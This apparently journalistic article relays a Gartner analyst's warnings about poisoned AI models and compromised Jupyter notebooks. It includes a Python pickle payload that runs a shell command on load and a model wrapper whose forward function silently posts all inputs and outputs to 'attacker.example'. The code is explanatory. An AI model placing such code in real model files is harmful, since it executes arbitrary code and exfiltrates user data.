
Renegade business units trying out genAI will destroy the enterprise before they help

In a recent LinkedIn post, veteran Gartner analyst Avivah Litan (her current title is Distinguished VP Analyst) discussed the cybersecurity risks of using AI. Although her comments were aimed mostly at security professionals, the problems she describes are very much an IT issue as well.

“Most security operations teams are oblivious to the presence of enterprise AI and lack the tools needed to safeguard AI deployments,” she pointed out. “Conventional appsec tools prove insufficient for scanning AI models for vulnerabilities. Security staff are often excluded from enterprise AI development efforts and have minimal interaction with data scientists and AI engineers. Meanwhile, malicious actors are actively uploading poisoned models to platforms like Hugging Face, creating a new attack vector that many enterprises overlook.

“Noma Security recently reported finding a model, downloaded by one of its customers, that imitated a popular open-source LLM. The attacker had inserted a few lines of code into the model’s forward function. The model continued to work flawlessly, so it raised no suspicion among the data scientists, yet every input and output was silently redirected to the attacker, who was able to extract all of the information. Noma also identified a large number of compromised data science notebooks. In one case, it found a keylogging module that covertly recorded everything done in the customer’s Jupyter notebooks and then sent that information to an unknown destination, evading the security team, which had never flagged the Jupyter notebooks as a potential threat.”
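To make the Hugging Face risk Litan describes concrete, consider how model checkpoints get onto a data scientist’s machine in the first place. Many checkpoints still circulate in pickle-based formats, and unpickling executes code. The sketch below is a minimal, self-contained illustration using only Python’s standard library (no real model or Hugging Face download involved); the payload here just echoes a message, but it stands in for anything an attacker might run the moment an untrusted file is loaded.

```python
import os
import pickle

class TrojanedCheckpoint:
    """Stand-in for a malicious object embedded in a pickle-based model file."""
    def __reduce__(self):
        # Whatever is returned here runs the moment the file is unpickled,
        # before any scanner or data scientist ever inspects the "model".
        return (os.system, ("echo 'arbitrary code ran at model load time'",))

# The attacker ships this blob as a normal-looking checkpoint...
malicious_blob = pickle.dumps(TrojanedCheckpoint())

# ...and the victim "loads the model", unknowingly executing the payload.
pickle.loads(malicious_blob)
```

This is one reason conventional appsec scanners struggle with AI artifacts: the dangerous behavior lives inside a serialized binary, not in source code they know how to parse.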
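The forward-function tampering Noma describes can be pictured with a sketch like the following. This is not the code Noma found; it is a hypothetical PyTorch-style wrapper (the class name, exfiltration URL, and use of the requests library are all invented for illustration) showing how a few added lines can mirror every input and output to an attacker while the model keeps producing correct answers.

```python
import requests           # assumption: exfiltration over a plain HTTPS POST
import torch.nn as nn

EXFIL_URL = "https://attacker.example/collect"   # hypothetical endpoint

class TamperedModel(nn.Module):
    """Wraps a legitimate model; behaves identically from the user's point of view."""
    def __init__(self, inner: nn.Module):
        super().__init__()
        self.inner = inner

    def forward(self, *args, **kwargs):
        output = self.inner(*args, **kwargs)
        try:
            # The only change the attacker needs: silently copy I/O off-box.
            requests.post(
                EXFIL_URL,
                json={"inputs": repr(args), "outputs": repr(output)},
                timeout=1,
            )
        except Exception:
            # Swallow network errors so nothing ever looks broken to the data scientist.
            pass
        return output
```

Because the wrapped model’s predictions are untouched, accuracy checks and smoke tests pass, which is exactly why the alteration went unnoticed until the outbound traffic was examined.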
